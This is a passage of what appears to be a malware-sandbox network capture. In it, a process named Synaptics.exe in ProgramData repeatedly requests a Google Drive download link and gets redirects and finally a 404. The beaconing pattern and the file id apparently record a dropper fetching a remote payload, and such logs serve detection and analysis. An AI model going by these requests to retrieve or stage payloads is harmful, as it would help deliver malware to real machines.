                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:09 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-WEvI9hWPNleHDzPxJSOQZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49919 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:08 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:09 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-NuFXMDsNLAWKXlWj_7PeLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49938 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:12 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:13 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ij3ySIsX3v7DM-djI41caA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49937 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:12 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:13 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Gq1sVW4kIK_9vaFpk8WPlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49954 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:16 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:17 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-w3twSt64Fpwmp3uHH5bL7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49955 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:16 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:17 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Cg1eCcJxqHs5tvRnpBkgCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                56 | 192.168.2.4 | 49973 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:20 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:21 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0QhEy_SD9F5WLySTmSoieg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                57 | 192.168.2.4 | 49974 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:20 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:21 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-aCYMD7DYRR3xlkxlFRwy-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                58 | 192.168.2.4 | 49988 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:23 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:23 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5kJECYbUYYAU2W7fxvjcYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                59 | 192.168.2.4 | 49987 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:23 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:24 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6zArIPqR8AdfXNuj4FoeAJqYC8o9qDzpLxjFKUr57gB8NfDKFh_274s4E1hJivsfBB
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:24 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-SNK-inYMPfjvOUB9ZgUvDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:24 UTC | 147 | IN
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:24 UTC | 1390 | IN
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="C_nJqSua5vS6I0t8CZrBEw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:24 UTC | 115 | IN
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                60 | 192.168.2.4 | 49985 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:23 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:23 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-X2zV4vENE5s9ehu2YcIWDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
